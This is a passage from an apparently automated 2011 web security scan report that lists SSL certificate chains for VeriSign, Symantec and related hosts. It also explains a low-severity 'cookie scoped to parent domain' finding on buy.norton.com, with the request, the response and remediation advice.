8.15. https://cert.webtrust.org/

Summary

Severity:   Information
Confidence:   Certain
Host:   https://cert.webtrust.org
Path:   /

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:  cert.webtrust.org
Issued by:  www.verisign.com/CPS Incorp.by Ref. LIABILITY LTD.(c)97 VeriSign
Valid from:  Wed Oct 21 18:00:00 GMT-06:00 2009
Valid to:  Sun Oct 21 17:59:59 GMT-06:00 2012

Certificate chain #1

Issued to:  www.verisign.com/CPS Incorp.by Ref. LIABILITY LTD.(c)97 VeriSign
Issued by:  Class 3 Public Primary Certification Authority
Valid from:  Wed Apr 16 18:00:00 GMT-06:00 1997
Valid to:  Mon Oct 24 17:59:59 GMT-06:00 2011

Certificate chain #2

Issued to:  Class 3 Public Primary Certification Authority
Issued by:  Class 3 Public Primary Certification Authority
Valid from:  Sun Jan 28 18:00:00 GMT-06:00 1996
Valid to:  Wed Aug 02 17:59:59 GMT-06:00 2028

8.16. https://donate.mozilla.org/

Summary

Severity:   Information
Confidence:   Certain
Host:   https://donate.mozilla.org
Path:   /

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:  donate.mozilla.org
Issued by:  UTN-USERFirst-Hardware
Valid from:  Mon Sep 20 18:00:00 GMT-06:00 2010
Valid to:  Wed Sep 21 17:59:59 GMT-06:00 2011

Certificate chain #1

Issued to:  UTN-USERFirst-Hardware
Issued by:  UTN-USERFirst-Hardware
Valid from:  Fri Jul 09 12:10:42 GMT-06:00 1999
Valid to:  Tue Jul 09 12:19:22 GMT-06:00 2019

8.17. https://drh.img.digitalriver.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   https://drh.img.digitalriver.com
Path:   /

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:  *.img.digitalriver.com,ST=Minnesota
Issued by:  Akamai Subordinate CA 3
Valid from:  Thu Feb 03 08:22:35 GMT-06:00 2011
Valid to:  Fri Feb 03 08:22:35 GMT-06:00 2012

Certificate chain #1

Issued to:  Akamai Subordinate CA 3
Issued by:  GTE CyberTrust Global Root
Valid from:  Thu May 11 09:32:00 GMT-06:00 2006
Valid to:  Sat May 11 17:59:00 GMT-06:00 2013

Certificate chain #2

Issued to:  GTE CyberTrust Global Root
Issued by:  GTE CyberTrust Global Root
Valid from:  Wed Aug 12 18:29:00 GMT-06:00 1998
Valid to:  Mon Aug 13 17:59:00 GMT-06:00 2018

8.18. https://enterprise-ssl-admin.verisign.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   https://enterprise-ssl-admin.verisign.com
Path:   /

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:  enterprise-ssl-admin.verisign.com
Issued by:  VeriSign Class 3 Extended Validation SSL SGC CA
Valid from:  Thu Oct 22 18:00:00 GMT-06:00 2009
Valid to:  Thu Oct 13 17:59:59 GMT-06:00 2011

Certificate chain #1

Issued to:  VeriSign Class 3 Extended Validation SSL SGC CA
Issued by:  VeriSign Class 3 Public Primary Certification Authority - G5
Valid from:  Tue Nov 07 18:00:00 GMT-06:00 2006
Valid to:  Mon Nov 07 17:59:59 GMT-06:00 2016

Certificate chain #2

Issued to:  VeriSign Class 3 Public Primary Certification Authority - G5
Issued by:  Class 3 Public Primary Certification Authority
Valid from:  Tue Nov 07 18:00:00 GMT-06:00 2006
Valid to:  Sun Nov 07 17:59:59 GMT-06:00 2021

Certificate chain #3

Issued to:  Class 3 Public Primary Certification Authority
Issued by:  Class 3 Public Primary Certification Authority
Valid from:  Sun Jan 28 18:00:00 GMT-06:00 1996
Valid to:  Tue Aug 01 17:59:59 GMT-06:00 2028

Certificate chain #4

Issued to:  Class 3 Public Primary Certification Authority
Issued by:  Class 3 Public Primary Certification Authority
Valid from:  Sun Jan 28 18:00:00 GMT-06:00 1996
Valid to:  Wed Aug 02 17:59:59 GMT-06:00 2028

8.19. https://idprotect.verisign.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   https://idprotect.verisign.com
Path:   /

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:  idprotect.verisign.com
Issued by:  VeriSign Class 3 Extended Validation SSL SGC CA
Valid from:  Wed Mar 24 18:00:00 GMT-06:00 2010
Valid to:  Sat Mar 24 17:59:59 GMT-06:00 2012

Certificate chain #1

Issued to:  VeriSign Class 3 Extended Validation SSL SGC CA
Issued by:  VeriSign Class 3 Public Primary Certification Authority - G5
Valid from:  Tue Nov 07 18:00:00 GMT-06:00 2006
Valid to:  Mon Nov 07 17:59:59 GMT-06:00 2016

Certificate chain #2

Issued to:  VeriSign Class 3 Public Primary Certification Authority - G5
Issued by:  Class 3 Public Primary Certification Authority
Valid from:  Tue Nov 07 18:00:00 GMT-06:00 2006
Valid to:  Sun Nov 07 17:59:59 GMT-06:00 2021

Certificate chain #3

Issued to:  Class 3 Public Primary Certification Authority
Issued by:  Class 3 Public Primary Certification Authority
Valid from:  Sun Jan 28 18:00:00 GMT-06:00 1996
Valid to:  Wed Aug 02 17:59:59 GMT-06:00 2028

8.20. https://partnernet.symantec.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   https://partnernet.symantec.com
Path:   /

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:  partnernet.symantec.com
Issued by:  VeriSign Class 3 International Server CA - G3
Valid from:  Thu Dec 16 18:00:00 GMT-06:00 2010
Valid to:  Sun Jan 08 17:59:59 GMT-06:00 2012

Certificate chain #1

Issued to:  VeriSign Class 3 International Server CA - G3
Issued by:  VeriSign Class 3 Public Primary Certification Authority - G5
Valid from:  Sun Feb 07 18:00:00 GMT-06:00 2010
Valid to:  Fri Feb 07 17:59:59 GMT-06:00 2020

Certificate chain #2

Issued to:  VeriSign Class 3 Public Primary Certification Authority - G5
Issued by:  Class 3 Public Primary Certification Authority
Valid from:  Tue Nov 07 18:00:00 GMT-06:00 2006
Valid to:  Sun Nov 07 17:59:59 GMT-06:00 2021

Certificate chain #3

Issued to:  Class 3 Public Primary Certification Authority
Issued by:  Class 3 Public Primary Certification Authority
Valid from:  Sun Jan 28 18:00:00 GMT-06:00 1996
Valid to:  Wed Aug 02 17:59:59 GMT-06:00 2028

8.21. https://policy3.responsys.net/

Summary

Severity:   Information
Confidence:   Certain
Host:   https://policy3.responsys.net
Path:   /

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:  *.responsys.net
Issued by:  Equifax Secure Certificate Authority
Valid from:  Sun May 16 05:02:14 GMT-06:00 2010
Valid to:  Sun Jun 17 14:48:31 GMT-06:00 2012

Certificate chain #1

Issued to:  Equifax Secure Certificate Authority
Issued by:  Equifax Secure Certificate Authority
Valid from:  Sat Aug 22 10:41:51 GMT-06:00 1998
Valid to:  Wed Aug 22 10:41:51 GMT-06:00 2018

8.22. https://press.verisign.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   https://press.verisign.com
Path:   /

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:  press.verisign.com
Issued by:  VeriSign Class 3 Extended Validation SSL SGC CA
Valid from:  Tue Mar 02 18:00:00 GMT-06:00 2010
Valid to:  Fri Mar 02 17:59:59 GMT-06:00 2012

Certificate chain #1

Issued to:  VeriSign Class 3 Extended Validation SSL SGC CA
Issued by:  VeriSign Class 3 Public Primary Certification Authority - G5
Valid from:  Tue Nov 07 18:00:00 GMT-06:00 2006
Valid to:  Mon Nov 07 17:59:59 GMT-06:00 2016

Certificate chain #2

Issued to:  VeriSign Class 3 Public Primary Certification Authority - G5
Issued by:  Class 3 Public Primary Certification Authority
Valid from:  Tue Nov 07 18:00:00 GMT-06:00 2006
Valid to:  Sun Nov 07 17:59:59 GMT-06:00 2021

Certificate chain #3

Issued to:  Class 3 Public Primary Certification Authority
Issued by:  Class 3 Public Primary Certification Authority
Valid from:  Sun Jan 28 18:00:00 GMT-06:00 1996
Valid to:  Wed Aug 02 17:59:59 GMT-06:00 2028

8.23. https://products.geotrust.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   https://products.geotrust.com
Path:   /

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:  products.geotrust.com
Issued by:  GeoTrust Extended Validation SSL CA
Valid from:  Sat Apr 16 15:58:45 GMT-06:00 2011
Valid to:  Sat May 18 12:50:47 GMT-06:00 2013

Certificate chain #1

Issued to:  GeoTrust Extended Validation SSL CA
Issued by:  GeoTrust Primary Certification Authority
Valid from:  Tue Nov 28 18:00:00 GMT-06:00 2006
Valid to:  Mon Nov 28 17:59:59 GMT-06:00 2016

Certificate chain #2

Issued to:  GeoTrust Primary Certification Authority
Issued by:  Equifax Secure Certificate Authority
Valid from:  Tue Nov 28 10:08:31 GMT-06:00 2006
Valid to:  Tue Aug 21 09:08:31 GMT-06:00 2018

Certificate chain #3

Issued to:  Equifax Secure Certificate Authority
Issued by:  Equifax Secure Certificate Authority
Valid from:  Sat Aug 22 10:41:51 GMT-06:00 1998
Valid to:  Wed Aug 22 10:41:51 GMT-06:00 2018

Certificate chain #4

Issued to:  Equifax Secure Certificate Authority
Issued by:  Equifax Secure Certificate Authority
Valid from:  Sat Aug 22 10:41:51 GMT-06:00 1998
Valid to:  Wed Aug 22 10:41:51 GMT-06:00 2018

8.24. https://products.verisign.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   https://products.verisign.com
Path:   /

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:  products.verisign.com
Issued by:  VeriSign Class 3 Extended Validation SSL CA
Valid from:  Wed Nov 18 18:00:00 GMT-06:00 2009
Valid to:  Wed Nov 30 17:59:59 GMT-06:00 2011

Certificate chain #1

Issued to:  VeriSign Class 3 Extended Validation SSL CA
Issued by:  VeriSign Class 3 Public Primary Certification Authority - G5
Valid from:  Tue Nov 07 18:00:00 GMT-06:00 2006
Valid to:  Mon Nov 07 17:59:59 GMT-06:00 2016

Certificate chain #2

Issued to:  VeriSign Class 3 Public Primary Certification Authority - G5
Issued by:  Class 3 Public Primary Certification Authority
Valid from:  Tue Nov 07 18:00:00 GMT-06:00 2006
Valid to:  Sun Nov 07 17:59:59 GMT-06:00 2021

Certificate chain #3

Issued to:  Class 3 Public Primary Certification Authority
Issued by:  Class 3 Public Primary Certification Authority
Valid from:  Sun Jan 28 18:00:00 GMT-06:00 1996
Valid to:  Tue Aug 01 17:59:59 GMT-06:00 2028

Certificate chain #4

Issued to:  Class 3 Public Primary Certification Authority
Issued by:  Class 3 Public Primary Certification Authority
Valid from:  Sun Jan 28 18:00:00 GMT-06:00 1996
Valid to:  Wed Aug 02 17:59:59 GMT-06:00 2028

8.25. https://renewals.symantec.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   https://renewals.symantec.com
Path:   /

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:  renewals.symantec.com
Issued by:  VeriSign Class 3 Extended Validation SSL SGC CA
Valid from:  Mon Apr 25 18:00:00 GMT-06:00 2011
Valid to:  Wed Apr 25 17:59:59 GMT-06:00 2012

Certificate chain #1

Issued to:  VeriSign Class 3 Extended Validation SSL SGC CA
Issued by:  VeriSign Class 3 Public Primary Certification Authority - G5
Valid from:  Tue Nov 07 18:00:00 GMT-06:00 2006
Valid to:  Mon Nov 07 17:59:59 GMT-06:00 2016

Certificate chain #2

Issued to:  VeriSign Class 3 Public Primary Certification Authority - G5
Issued by:  Class 3 Public Primary Certification Authority
Valid from:  Tue Nov 07 18:00:00 GMT-06:00 2006
Valid to:  Sun Nov 07 17:59:59 GMT-06:00 2021

Certificate chain #3

Issued to:  Class 3 Public Primary Certification Authority
Issued by:  Class 3 Public Primary Certification Authority
Valid from:  Sun Jan 28 18:00:00 GMT-06:00 1996
Valid to:  Tue Aug 01 17:59:59 GMT-06:00 2028

Certificate chain #4

Issued to:  Class 3 Public Primary Certification Authority
Issued by:  Class 3 Public Primary Certification Authority
Valid from:  Sun Jan 28 18:00:00 GMT-06:00 1996
Valid to:  Wed Aug 02 17:59:59 GMT-06:00 2028

8.26. https://seal.verisign.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   https://seal.verisign.com
Path:   /

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:  seal.verisign.com
Issued by:  VeriSign Class 3 Secure Server CA - G2
Valid from:  Tue Jul 06 18:00:00 GMT-06:00 2010
Valid to:  Sun Jul 06 17:59:59 GMT-06:00 2014

Certificate chain #1

Issued to:  VeriSign Class 3 Secure Server CA - G2
Issued by:  VeriSign Trust Network
Valid from:  Tue Mar 24 18:00:00 GMT-06:00 2009
Valid to:  Sun Mar 24 17:59:59 GMT-06:00 2019

Certificate chain #2

Issued to:  VeriSign Trust Network
Issued by:  VeriSign Trust Network
Valid from:  Sun May 17 18:00:00 GMT-06:00 1998
Valid to:  Tue Aug 01 17:59:59 GMT-06:00 2028

Certificate chain #3

Issued to:  VeriSign Trust Network
Issued by:  VeriSign Trust Network
Valid from:  Sun May 17 18:00:00 GMT-06:00 1998
Valid to:  Tue Aug 01 17:59:59 GMT-06:00 2028

8.27. https://securitycenter.verisign.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   https://securitycenter.verisign.com
Path:   /

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:  SECURITYCENTER.VERISIGN.COM
Issued by:  VeriSign Class 3 Extended Validation SSL SGC CA
Valid from:  Mon Dec 27 18:00:00 GMT-06:00 2010
Valid to:  Thu Dec 27 17:59:59 GMT-06:00 2012

Certificate chain #1

Issued to:  VeriSign Class 3 Extended Validation SSL SGC CA
Issued by:  VeriSign Class 3 Public Primary Certification Authority - G5
Valid from:  Tue Nov 07 18:00:00 GMT-06:00 2006
Valid to:  Mon Nov 07 17:59:59 GMT-06:00 2016

Certificate chain #2

Issued to:  VeriSign Class 3 Public Primary Certification Authority - G5
Issued by:  Class 3 Public Primary Certification Authority
Valid from:  Tue Nov 07 18:00:00 GMT-06:00 2006
Valid to:  Sun Nov 07 17:59:59 GMT-06:00 2021

Certificate chain #3

Issued to:  Class 3 Public Primary Certification Authority
Issued by:  Class 3 Public Primary Certification Authority
Valid from:  Sun Jan 28 18:00:00 GMT-06:00 1996
Valid to:  Wed Aug 02 17:59:59 GMT-06:00 2028

8.28. https://symaccount.symantec.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   https://symaccount.symantec.com
Path:   /

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:  symaccount.symantec.com
Issued by:  VeriSign Class 3 International Server CA - G3
Valid from:  Thu Feb 10 18:00:00 GMT-06:00 2011
Valid to:  Thu Mar 01 17:59:59 GMT-06:00 2012

Certificate chain #1

Issued to:  VeriSign Class 3 International Server CA - G3
Issued by:  VeriSign Class 3 Public Primary Certification Authority - G5
Valid from:  Sun Feb 07 18:00:00 GMT-06:00 2010
Valid to:  Fri Feb 07 17:59:59 GMT-06:00 2020

Certificate chain #2

Issued to:  VeriSign Class 3 Public Primary Certification Authority - G5
Issued by:  Class 3 Public Primary Certification Authority
Valid from:  Tue Nov 07 18:00:00 GMT-06:00 2006
Valid to:  Sun Nov 07 17:59:59 GMT-06:00 2021

Certificate chain #3

Issued to:  Class 3 Public Primary Certification Authority
Issued by:  Class 3 Public Primary Certification Authority
Valid from:  Sun Jan 28 18:00:00 GMT-06:00 1996
Valid to:  Wed Aug 02 17:59:59 GMT-06:00 2028

8.29. https://symantec-corporation.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   https://symantec-corporation.com
Path:   /

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:  symantec-corporation.com
Issued by:  VeriSign Class 3 International Server CA - G3
Valid from:  Mon May 16 18:00:00 GMT-06:00 2011
Valid to:  Wed May 16 17:59:59 GMT-06:00 2012

Certificate chain #1

Issued to:  VeriSign Class 3 International Server CA - G3
Issued by:  VeriSign Class 3 Public Primary Certification Authority - G5
Valid from:  Sun Feb 07 18:00:00 GMT-06:00 2010
Valid to:  Fri Feb 07 17:59:59 GMT-06:00 2020

Certificate chain #2

Issued to:  VeriSign Class 3 Public Primary Certification Authority - G5
Issued by:  Class 3 Public Primary Certification Authority
Valid from:  Tue Nov 07 18:00:00 GMT-06:00 2006
Valid to:  Sun Nov 07 17:59:59 GMT-06:00 2021

Certificate chain #3

Issued to:  Class 3 Public Primary Certification Authority
Issued by:  Class 3 Public Primary Certification Authority
Valid from:  Sun Jan 28 18:00:00 GMT-06:00 1996
Valid to:  Wed Aug 02 17:59:59 GMT-06:00 2028

8.30. https://test-products.verisign.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   https://test-products.verisign.com
Path:   /

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:  test-products.verisign.com
Issued by:  VeriSign Class 3 Extended Validation SSL CA
Valid from:  Sun Nov 07 18:00:00 GMT-06:00 2010
Valid to:  Wed Nov 07 17:59:59 GMT-06:00 2012

Certificate chain #1

Issued to:  VeriSign Class 3 Extended Validation SSL CA
Issued by:  VeriSign Class 3 Public Primary Certification Authority - G5
Valid from:  Tue Nov 07 18:00:00 GMT-06:00 2006
Valid to:  Mon Nov 07 17:59:59 GMT-06:00 2016

Certificate chain #2

Issued to:  VeriSign Class 3 Public Primary Certification Authority - G5
Issued by:  Class 3 Public Primary Certification Authority
Valid from:  Tue Nov 07 18:00:00 GMT-06:00 2006
Valid to:  Sun Nov 07 17:59:59 GMT-06:00 2021

Certificate chain #3

Issued to:  Class 3 Public Primary Certification Authority
Issued by:  Class 3 Public Primary Certification Authority
Valid from:  Sun Jan 28 18:00:00 GMT-06:00 1996
Valid to:  Wed Aug 02 17:59:59 GMT-06:00 2028

Certificate chain #4

Issued to:  Class 3 Public Primary Certification Authority
Issued by:  Class 3 Public Primary Certification Authority
Valid from:  Sun Jan 28 18:00:00 GMT-06:00 1996
Valid to:  Wed Aug 02 17:59:59 GMT-06:00 2028

8.31. https://vipdeveloper.verisign.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   https://vipdeveloper.verisign.com
Path:   /

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:  vipdeveloper.verisign.com
Issued by:  VeriSign Class 3 Extended Validation SSL CA
Valid from:  Wed Mar 17 18:00:00 GMT-06:00 2010
Valid to:  Sat Mar 17 17:59:59 GMT-06:00 2012

Certificate chain #1

Issued to:  VeriSign Class 3 Extended Validation SSL CA
Issued by:  VeriSign Class 3 Public Primary Certification Authority - G5
Valid from:  Tue Nov 07 18:00:00 GMT-06:00 2006
Valid to:  Mon Nov 07 17:59:59 GMT-06:00 2016

Certificate chain #2

Issued to:  VeriSign Class 3 Public Primary Certification Authority - G5
Issued by:  Class 3 Public Primary Certification Authority
Valid from:  Tue Nov 07 18:00:00 GMT-06:00 2006
Valid to:  Sun Nov 07 17:59:59 GMT-06:00 2021

Certificate chain #3

Issued to:  Class 3 Public Primary Certification Authority
Issued by:  Class 3 Public Primary Certification Authority
Valid from:  Sun Jan 28 18:00:00 GMT-06:00 1996
Valid to:  Wed Aug 02 17:59:59 GMT-06:00 2028

8.32. https://vipmanager.verisign.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   https://vipmanager.verisign.com
Path:   /

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:  vipmanager.verisign.com
Issued by:  VeriSign Class 3 Extended Validation SSL CA
Valid from:  Sun Mar 07 18:00:00 GMT-06:00 2010
Valid to:  Sat Mar 24 17:59:59 GMT-06:00 2012

Certificate chain #1

Issued to:  VeriSign Class 3 Extended Validation SSL CA
Issued by:  VeriSign Class 3 Public Primary Certification Authority - G5
Valid from:  Tue Nov 07 18:00:00 GMT-06:00 2006
Valid to:  Mon Nov 07 17:59:59 GMT-06:00 2016

Certificate chain #2

Issued to:  VeriSign Class 3 Public Primary Certification Authority - G5
Issued by:  Class 3 Public Primary Certification Authority
Valid from:  Tue Nov 07 18:00:00 GMT-06:00 2006
Valid to:  Sun Nov 07 17:59:59 GMT-06:00 2021

Certificate chain #3

Issued to:  Class 3 Public Primary Certification Authority
Issued by:  Class 3 Public Primary Certification Authority
Valid from:  Sun Jan 28 18:00:00 GMT-06:00 1996
Valid to:  Wed Aug 02 17:59:59 GMT-06:00 2028

8.33. https://vipmobile.verisign.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   https://vipmobile.verisign.com
Path:   /

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:  vipmobile.verisign.com
Issued by:  VeriSign Class 3 Extended Validation SSL SGC CA
Valid from:  Sun Dec 12 18:00:00 GMT-06:00 2010
Valid to:  Wed Dec 12 17:59:59 GMT-06:00 2012

Certificate chain #1

Issued to:  VeriSign Class 3 Extended Validation SSL SGC CA
Issued by:  VeriSign Class 3 Public Primary Certification Authority - G5
Valid from:  Tue Nov 07 18:00:00 GMT-06:00 2006
Valid to:  Mon Nov 07 17:59:59 GMT-06:00 2016

Certificate chain #2

Issued to:  VeriSign Class 3 Public Primary Certification Authority - G5
Issued by:  Class 3 Public Primary Certification Authority
Valid from:  Tue Nov 07 18:00:00 GMT-06:00 2006
Valid to:  Sun Nov 07 17:59:59 GMT-06:00 2021

Certificate chain #3

Issued to:  Class 3 Public Primary Certification Authority
Issued by:  Class 3 Public Primary Certification Authority
Valid from:  Sun Jan 28 18:00:00 GMT-06:00 1996
Valid to:  Wed Aug 02 17:59:59 GMT-06:00 2028

8.34. https://vs.symantec.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   https://vs.symantec.com
Path:   /

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:  vs.symantec.com
Issued by:  VeriSign Class 3 Extended Validation SSL SGC CA
Valid from:  Mon Jun 27 18:00:00 GMT-06:00 2011
Valid to:  Thu Jun 27 17:59:59 GMT-06:00 2013

Certificate chain #1

Issued to:  VeriSign Class 3 Extended Validation SSL SGC CA
Issued by:  VeriSign Class 3 Public Primary Certification Authority - G5
Valid from:  Tue Nov 07 18:00:00 GMT-06:00 2006
Valid to:  Mon Nov 07 17:59:59 GMT-06:00 2016

Certificate chain #2

Issued to:  VeriSign Class 3 Public Primary Certification Authority - G5
Issued by:  Class 3 Public Primary Certification Authority
Valid from:  Tue Nov 07 18:00:00 GMT-06:00 2006
Valid to:  Sun Nov 07 17:59:59 GMT-06:00 2021

Certificate chain #3

Issued to:  Class 3 Public Primary Certification Authority
Issued by:  Class 3 Public Primary Certification Authority
Valid from:  Sun Jan 28 18:00:00 GMT-06:00 1996
Valid to:  Wed Aug 02 17:59:59 GMT-06:00 2028

8.35. https://www-secure.symantec.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www-secure.symantec.com
Path:   /

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:  www-secure.symantec.com
Issued by:  VeriSign Class 3 Extended Validation SSL SGC CA
Valid from:  Fri Oct 08 18:00:00 GMT-06:00 2010
Valid to:  Mon Oct 08 17:59:59 GMT-06:00 2012

Certificate chain #1

Issued to:  VeriSign Class 3 Extended Validation SSL SGC CA
Issued by:  VeriSign Class 3 Public Primary Certification Authority - G5
Valid from:  Tue Nov 07 18:00:00 GMT-06:00 2006
Valid to:  Mon Nov 07 17:59:59 GMT-06:00 2016

Certificate chain #2

Issued to:  VeriSign Class 3 Public Primary Certification Authority - G5
Issued by:  Class 3 Public Primary Certification Authority
Valid from:  Tue Nov 07 18:00:00 GMT-06:00 2006
Valid to:  Sun Nov 07 17:59:59 GMT-06:00 2021

Certificate chain #3

Issued to:  Class 3 Public Primary Certification Authority
Issued by:  Class 3 Public Primary Certification Authority
Valid from:  Sun Jan 28 18:00:00 GMT-06:00 1996
Valid to:  Wed Aug 02 17:59:59 GMT-06:00 2028

8.36. https://www.verisign.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.verisign.com
Path:   /

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:  www.verisign.com
Issued by:  VeriSign Class 3 Extended Validation SSL SGC CA
Valid from:  Tue May 25 18:00:00 GMT-06:00 2010
Valid to:  Fri May 25 17:59:59 GMT-06:00 2012

Certificate chain #1

Issued to:  VeriSign Class 3 Extended Validation SSL SGC CA
Issued by:  VeriSign Class 3 Public Primary Certification Authority - G5
Valid from:  Tue Nov 07 18:00:00 GMT-06:00 2006
Valid to:  Mon Nov 07 17:59:59 GMT-06:00 2016

Certificate chain #2

Issued to:  VeriSign Class 3 Public Primary Certification Authority - G5
Issued by:  Class 3 Public Primary Certification Authority
Valid from:  Tue Nov 07 18:00:00 GMT-06:00 2006
Valid to:  Sun Nov 07 17:59:59 GMT-06:00 2021

Certificate chain #3

Issued to:  Class 3 Public Primary Certification Authority
Issued by:  Class 3 Public Primary Certification Authority
Valid from:  Sun Jan 28 18:00:00 GMT-06:00 1996
Valid to:  Wed Aug 02 17:59:59 GMT-06:00 2028

8.37. https://www4.symantec.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www4.symantec.com
Path:   /

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:  www4.symantec.com
Issued by:  VeriSign Class 3 International Server CA - G3
Valid from:  Thu Nov 18 18:00:00 GMT-06:00 2010
Valid to:  Sat Nov 19 17:59:59 GMT-06:00 2011

Certificate chain #1

Issued to:  VeriSign Class 3 International Server CA - G3
Issued by:  VeriSign Class 3 Public Primary Certification Authority - G5
Valid from:  Sun Feb 07 18:00:00 GMT-06:00 2010
Valid to:  Fri Feb 07 17:59:59 GMT-06:00 2020

Certificate chain #2

Issued to:  VeriSign Class 3 Public Primary Certification Authority - G5
Issued by:  Class 3 Public Primary Certification Authority
Valid from:  Tue Nov 07 18:00:00 GMT-06:00 2006
Valid to:  Sun Nov 07 17:59:59 GMT-06:00 2021

Certificate chain #3

Issued to:  Class 3 Public Primary Certification Authority
Issued by:  Class 3 Public Primary Certification Authority
Valid from:  Sun Jan 28 18:00:00 GMT-06:00 1996
Valid to:  Wed Aug 02 17:59:59 GMT-06:00 2028

9. Cookie scoped to parent domain
There are 82 instances of this issue:

Issue background

A cookie's domain attribute determines which domains can access the cookie. Browsers will automatically submit the cookie in requests to in-scope domains, and those domains will also be able to access the cookie via JavaScript. If a cookie is scoped to a parent domain, then that cookie will be accessible by the parent domain and also by any other subdomains of the parent domain. If the cookie contains sensitive data (such as a session token) then this data may be accessible by less trusted or less secure applications residing at those domains, leading to a security compromise.

Issue remediation

By default, cookies are scoped to the issuing domain and all subdomains. If you remove the explicit domain attribute from your Set-Cookie directive, then the cookie will have this default scope, which is safe and appropriate in most situations. If you particularly need a cookie to be accessible by a parent domain, then you should thoroughly review the security of the applications residing on that domain and its subdomains, and confirm that you are willing to trust the people and systems which support those applications.


9.1. http://buy.norton.com/

Summary

Severity:   Low
Confidence:   Firm
Host:   http://buy.norton.com
Path:   /

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /?wicket:interface=:0:hf_pnl_mf_nprd_HeaderTopPanel_0:countryDropdown:globalStores:0:globalStore::ILinkListener:: HTTP/1.1
Host: buy.norton.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Moved Temporarily
Cache-Control: no-cache="set-cookie"
Connection: close
Date: Fri, 09 Sep 2011 21:37:25 GMT
Location: http://buy.norton.com/redirector/estore?COUNTRY=AR&VENDORID=Symantec_symEpVendor&LANGUAGE=ES&CURRENCY=ARS&PROMOID=
Set-Cookie: symSessionGuid=0302548D-BA19-1881-F439-29EE8A29C341; domain=.norton.com; expires=Monday, 06-Sep-2021 21:37:25 GMT; path=/
Set-Cookie: sessionExpiration=US#en#Symantec_symEpVendor#null#null#null#null#null; domain=.norton.com; expires=Monday, 06-Sep-2021 21:37:25 GMT; path=/
X-Powered-By: Servlet/2.5 JSP/2.1
Content-Length: 455

<html><head><title>302 Moved Temporarily</title></head>
<body bgcolor="#FFFFFF">
<p>This document you requested has moved temporarily.</p>
<p>It's now at <a href="http://buy.norton.com/redirector/e
...[SNIP]...

9.2. http://buy.norton.com/estore/mf/category/categoryCode/All_In_One_Security_Sub_Category/CategoryURLname/all-in-one-security/

Summary

Severity:   Low
Confidence:   Firm
Host:   http://buy.norton.com
Path:   /estore/mf/category/categoryCode/All_In_One_Security_Sub_Category/CategoryURLname/all-in-one-security/

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /estore/mf/category/categoryCode/All_In_One_Security_Sub_Category/CategoryURLname/all-in-one-security/ HTTP/1.1
Host: buy.norton.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

